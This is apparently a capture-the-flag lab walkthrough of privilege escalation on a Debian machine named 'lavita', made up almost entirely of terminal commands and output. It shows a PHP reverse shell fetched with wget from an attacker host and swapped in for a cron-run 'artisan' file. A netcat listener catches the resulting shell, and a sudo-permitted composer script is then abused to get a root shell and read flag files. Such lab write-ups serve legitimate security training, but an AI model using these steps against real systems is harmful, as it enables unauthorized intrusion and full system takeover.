Priv Esc
Last updated
Last updated
$ ss -anp
...
tcp LISTEN 0 80 127.0.0.1:3306 0.0.0.0:*
tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
tcp ESTAB 0 2 192.168.111.38:52228 192.168.45.168:1337 users:(("nc",pid=4310,fd=3))
tcp LISTEN 0 511 *:80 *:*
tcp LISTEN 0 128 [::]:22 [::]:*
tcp ESTAB 0 0 [::ffff:192.168.111.38]:80 [::ffff:192.168.251.111]:42176
v_str ESTAB 0 0 3293820751:1023 0:976lavita:sdfquelw0kly9jgbx92sdfquelw0kly9jgbx9Skunk is running the following cron job
www-data@debian:/dev/shm$ ls -la /var/www/html/lavita/artisan
-rwxr-xr-x 1 www-data www-data 1686 Nov 10 2020 /var/www/html/lavita/artisanwww-data@debian:/var/www/html/lavita$ wget 192.168.45.239/php-reverse-shell.php
--2024-09-16 20:09:10-- http://192.168.45.239/php-reverse-shell.php
Connecting to 192.168.45.239:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5496 (5.4K) [application/octet-stream]
Saving to: ‘php-reverse-shell.php’
php-reverse-shell.p 100%[===================>] 5.37K --.-KB/s in 0.001s
2024-09-16 20:09:10 (7.06 MB/s) - ‘php-reverse-shell.php’ saved [5496/5496]
www-data@debian:/var/www/html/lavita$ rm artisan
www-data@debian:/var/www/html/lavita$ mv php-reverse-shell.php artisan$ nc -lnvp 1338
listening on [any] 1338 ...
connect to [192.168.45.239] from (UNKNOWN) [192.168.235.38] 51340
Linux debian 5.10.0-25-amd64 #1 SMP Debian 5.10.191-1 (2023-08-16) x86_64 GNU/Linux
20:10:08 up 46 min, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=1001(skunk) gid=1001(skunk) groups=1001(skunk),27(sudo),33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami && id && cat /home/skunk/local.txt && ip a
skunk
uid=1001(skunk) gid=1001(skunk) groups=1001(skunk),27(sudo),33(www-data)
29f6f5609176f708b80640e2cf2ac5f3
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
3: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:bf:69:4d brd ff:ff:ff:ff:ff:ff
altname enp11s0
inet 192.168.235.38/24 brd 192.168.235.255 scope global ens192
valid_lft forever preferred_lft forever
inet6 fe80::250:56ff:febf:694d/64 scope link
valid_lft forever preferred_lft forever
skunk@debian:~$ sudo -l
Matching Defaults entries for skunk on debian:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User skunk may run the following commands on debian:
(ALL : ALL) ALL
(root) NOPASSWD: /usr/bin/composer --working-dir\=/var/www/html/lavita *
skunk@debian:~$ id
uid=1001(skunk) gid=1001(skunk) groups=1001(skunk),27(sudo),33(www-data)Go back to www-data shell
www-data@debian:/var/www/html/lavita$ echo '{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}' > composer.jsonBack in skunk shell
skunk@debian:/var/www/html/lavita$ sudo /usr/bin/composer --working-dir\=/var/www/html/lavita run-script x
Do not run Composer as root/super user! See https://getcomposer.org/root for details
Continue as root/super user [yes]? yes
> /bin/sh -i 0<&3 1>&3 2>&3
# whoami && cat /root/proof.txt && ip addr
root
c380027d15f40bf8d3325d392ce50dc4
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
3: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:bf:69:4d brd ff:ff:ff:ff:ff:ff
altname enp11s0
inet 192.168.235.38/24 brd 192.168.235.255 scope global ens192
valid_lft forever preferred_lft forever
inet6 fe80::250:56ff:febf:694d/64 scope link
valid_lft forever preferred_lft forever
#
